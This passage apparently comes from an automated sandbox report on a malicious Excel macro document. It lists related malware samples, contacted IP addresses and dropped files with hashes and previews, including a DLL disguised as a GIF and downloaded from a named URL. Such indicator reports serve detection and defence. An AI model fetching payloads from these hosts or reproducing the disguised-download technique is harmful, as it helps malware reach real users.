                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        mail_6512365134_7863_202104108.htmlGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        Copia bancaria de swift.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        SecuriteInfo.com.Trojan.GenericKD.36659493.29456.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        SecuriteInfo.com.Trojan.Siggen12.64197.30705.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        #Ud83d#Udcde973.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        3vQD6TIYA1.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        SOLICITUD DE PRESUPUESTO 08-04-2021#U00b7pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        XN123gfQJQ.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        documento.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        securedmessage.htmGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        Smart wireless request.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        SecuriteInfo.com.Trojan.PWS.Siggen2.64388.32153.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        BB44.vbsGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        BrgW593cHH.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        FAKTURA I RACHUNKI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        WDnE51mua6.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173
                                                                                                                                                                        ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                                                                                                                        • 162.251.80.27
                                                                                                                                                                        • 67.222.38.97
                                                                                                                                                                        • 173.201.252.173

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                        C:\Users\user\ghnrope2.dlldocuments-351331057.xlsmGet hashmaliciousBrowse
                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gifdocuments-351331057.xlsmGet hashmaliciousBrowse

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\9E06A6E6-90D2-41D3-A4CC-ADC48F853023
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):133170
                                                                                                                                                                            Entropy (8bit):5.371011445501101
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:ucQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:+VQ9DQW+zTXiJ
                                                                                                                                                                            MD5:61D62DEE0BA3D5AA415AD796F0B7CD38
                                                                                                                                                                            SHA1:914F9B5EE7BEB705D3137EFC1D4C9CD1ABFB2B6D
                                                                                                                                                                            SHA-256:38153943035E810F6CC0B43D0995DD16C561B1927D3472B8AEFB1595D9C6A5BE
                                                                                                                                                                            SHA-512:95A50013C647671C9A3BBAA911BE1F6E6EA0FFBD0939B2836DB09743DC33D32DEC8F12EADB4E61CF8649ADCC9C7EEB5934425A30FF390E3A3247E262B18AB2DE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-04-09T14:50:28">.. Build: 16.0.13925.30526-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\42C71EAC.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):557
                                                                                                                                                                            Entropy (8bit):7.343009301479381
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                                            MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                                            SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                                            SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                                            SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\55656197.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8301
                                                                                                                                                                            Entropy (8bit):7.970711494690041
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                                            MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                                            SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                                            SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                                            SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B92116BD.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):848
                                                                                                                                                                            Entropy (8bit):7.595467031611744
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                                            MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                                            SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                                            SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                                            SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CE32759A.png
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8854
                                                                                                                                                                            Entropy (8bit):7.949751503848125
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
                                                                                                                                                                            MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
                                                                                                                                                                            SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
                                                                                                                                                                            SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
                                                                                                                                                                            SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                                            Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\0604[1].gif
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                                                                                                                                                                            Category:downloaded
                                                                                                                                                                            Size (bytes):186502
                                                                                                                                                                            Entropy (8bit):6.182486294134606
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo
                                                                                                                                                                            MD5:E5726F9CD266AB1E58D53B6AE7C2BD5B
                                                                                                                                                                            SHA1:C3CB80D45C8953E258F5DB8359EDC1E7042F1899
                                                                                                                                                                            SHA-256:71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06
                                                                                                                                                                            SHA-512:2CD34F6C63254E20696A5B15DB2C95F4F7E0278F840275CCB0DE92947359C2DD3FFCDDC0A6194ED25145FBA14EE7DF6B519A68FCCC2339F8E038DBE329F2C313
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: documents-351331057.xlsm, Detection: malicious, Browse
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            IE Cache URL:https://shalombaptistchapel.com/ds/0604.gif
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................Rich..........PE..d..._.p`.........." ......................................................................`.....................................................<...................................0...................................................0............................text............................... ..`.rdata..@...........................@..@.data...............................@....pdata...............~..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\4BA10000
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):97555
                                                                                                                                                                            Entropy (8bit):7.8783511704627704
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfAw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mz
                                                                                                                                                                            MD5:DB2160DFC0FABA36852E1AD4EC8CCED9
                                                                                                                                                                            SHA1:0E83F3FC5EFFE7E0DAABC903FADB31DABD221911
                                                                                                                                                                            SHA-256:02D771F643F5684ECB0788F4A8E55750CB061B1E1675D6637EFB8E44731032B4
                                                                                                                                                                            SHA-512:19B7C1D3C4D74F60C14D15AF29A54F24AA6D09B5DEE653B769AA5746094C4FB7AEDD29B7F400B6AA8A5ACE43B48E9EC8D45F90038646C1D7257B8E40BCD11EA5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .UKO.0..#...|]%..Vh....Y$......_..h.=c7..J.......1.$......"j.Zv.X.Nz.]..wW.9.0.....Z..d...'.e....e}J.7.({........G+....!..~6.......)s.../..I.....L.c..{Y.e"...Hd.?8.N.........D.`. ....&DM...R....u.4.........9............@!.|...G..ZAu#b........}.O..7.Ir..kXH0MI..BF.........nQ*H..t....d{.r%.x...{0B.7{.Y.Q/,..}........N.../...]hv.ii..8.....^DP...G...^s..x...pq|...6]..7...y.....G]F.. &..a.i...i...n....A...k........PK..........!.\lC............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:34:24 2019, mtime=Fri Apr 9 22:50:30 2021, atime=Fri Apr 9 22:50:30 2021, length=8192, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):909
                                                                                                                                                                            Entropy (8bit):4.676195772667924
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:8NNcJRUxBv6CHiEWwGXI2DWE+W+jA0/y1bDyDLkeGLkeM4t2Y+xIBjKZm:8NQWBdW9YYWjA0KJDyp7aB6m
                                                                                                                                                                            MD5:0B8D1A9E36797016121FE0C0EA87A20A
                                                                                                                                                                            SHA1:B97A34B6446FFC6EB2224948F73AEE6E5C986A78
                                                                                                                                                                            SHA-256:8364D1052334177E19C922E62D47D6148E47F5C380B533FF8B99D863AC73E3BE
                                                                                                                                                                            SHA-512:E6ED65049C0E705041E08047742058A22B33C2C66AA30ED287DF851BC367D0FCA3D337E29E2A1E86DF5CDEE8147CD5F8518878281683787BC99CEE476BADA6EE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: L..................F............-...s...-...s...-... ......................y....P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...RF.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..RF......S......................I.a.l.f.o.n.s.....~.1......RP...Desktop.h.......NM..RP......Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......F...............-.......E...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Aw...`.......X.......960781...........!a..%.H.VZAj...q.I..........W...!a..%.H.VZAj...q.I..........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\documents-351331057.LNK
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 13:47:05 2020, mtime=Fri Apr 9 22:50:30 2021, atime=Fri Apr 9 22:50:30 2021, length=97555, window=hide
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2220
                                                                                                                                                                            Entropy (8bit):4.7306633277800225
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:8gLW9ZWAqEPKYq8B6pgLW9ZWAqEPKYq8B6:8ruAWYBKruAWYB
                                                                                                                                                                            MD5:931DD1FBEE0FA37003D23670FF803474
                                                                                                                                                                            SHA1:356E46DD8704A2D60567255668FD08A219DD2D31
                                                                                                                                                                            SHA-256:76D858C1C07A6F6C01D08D2EFFF68CFB1D400F6ADAA1921F64C8C9DF186C368D
                                                                                                                                                                            SHA-512:96B86C69E3E24B0D82E5A38C16944DAF1A31D06CA44B0915A221E3AE8E04DE0E200DD3B121ADF64A7932CCC902A07DE0BA2B27D863BAE04DE5EDC4647A3D2796
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: L..................F.... ...c.8...._...-..T....-...}...........................P.O. .:i.....+00.../C:\...................x.1......Ng...Users.d......L...RF.....................:......B..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....T.1.....>Q.u..user..>.......NM..RF......S......................I.a.l.f.o.n.s.....~.1.....>Q.u..Desktop.h.......NM..RF......Y..............>.....Z...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2......RK. .DOCUME~1.XLS..b......>Q.u.RK.....f.....................C.b.d.o.c.u.m.e.n.t.s.-.3.5.1.3.3.1.0.5.7...x.l.s.m......._...............-.......^...........>.S......C:\Users\user\Desktop\documents-351331057.xlsm../.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.s.-.3.5.1.3.3.1.0.5.7...x.l.s.m.........:..,.LB.)...Aw...`.......X.......960781...........!a..%.H.VZAj....Yt.+........W...!a..%.H.VZAj....Yt.+........W..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2
                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):112
                                                                                                                                                                            Entropy (8bit):4.640181681444124
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:oyBVomxWKS9LR8RyUZELR8RyUmxWKS9LR8RyUv:dj49L6ZEL6N9L6v
                                                                                                                                                                            MD5:B0563079CDA1FDF6A5226553A994DAA1
                                                                                                                                                                            SHA1:54E2C87E0E6094ACA9C68AE8693EBD018E48DF3E
                                                                                                                                                                            SHA-256:1085EA2B0429C2167666256B8D1676C3D78E630BAC5D2C436B9F0AA575359A47
                                                                                                                                                                            SHA-512:3E551CF9BA78AFF3713BB0C4B6167C5EB54A3EB8FD0A758248059030163929F20B11B481F3FFC6A8932DDCF0085765B521BF5C4E462286CD8361ADD6F26064DA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: Desktop.LNK=0..[misc]..documents-351331057.LNK=0..documents-351331057.LNK=0..[misc]..documents-351331057.LNK=0..
                                                                                                                                                                            C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):22
                                                                                                                                                                            Entropy (8bit):2.9808259362290785
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                                            MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                                            SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                                            SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                                            SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                                            C:\Users\user\Desktop\1CA10000
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):97555
                                                                                                                                                                            Entropy (8bit):7.8783511704627704
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfAw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mz
                                                                                                                                                                            MD5:DB2160DFC0FABA36852E1AD4EC8CCED9
                                                                                                                                                                            SHA1:0E83F3FC5EFFE7E0DAABC903FADB31DABD221911
                                                                                                                                                                            SHA-256:02D771F643F5684ECB0788F4A8E55750CB061B1E1675D6637EFB8E44731032B4
                                                                                                                                                                            SHA-512:19B7C1D3C4D74F60C14D15AF29A54F24AA6D09B5DEE653B769AA5746094C4FB7AEDD29B7F400B6AA8A5ACE43B48E9EC8D45F90038646C1D7257B8E40BCD11EA5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .UKO.0..#...|]%..Vh....Y$......_..h.=c7..J.......1.$......"j.Zv.X.Nz.]..wW.9.0.....Z..d...'.e....e}J.7.({........G+....!..~6.......)s.../..I.....L.c..{Y.e"...Hd.?8.N.........D.`. ....&DM...R....u.4.........9............@!.|...G..ZAu#b........}.O..7.Ir..kXH0MI..BF.........nQ*H..t....d{.r%.x...{0B.7{.Y.Q/,..}........N.../...]hv.ii..8.....^DP...G...^s..x...pq|...6]..7...y.....G]F.. &..a.i...i...n....A...k........PK..........!.\lC............[Content_Types].xml ...(.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\Desktop\~$documents-351331057.xlsm
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):330
                                                                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                                            MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                                            SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                                            SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                                            SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                            C:\Users\user\ghnrope2.dll
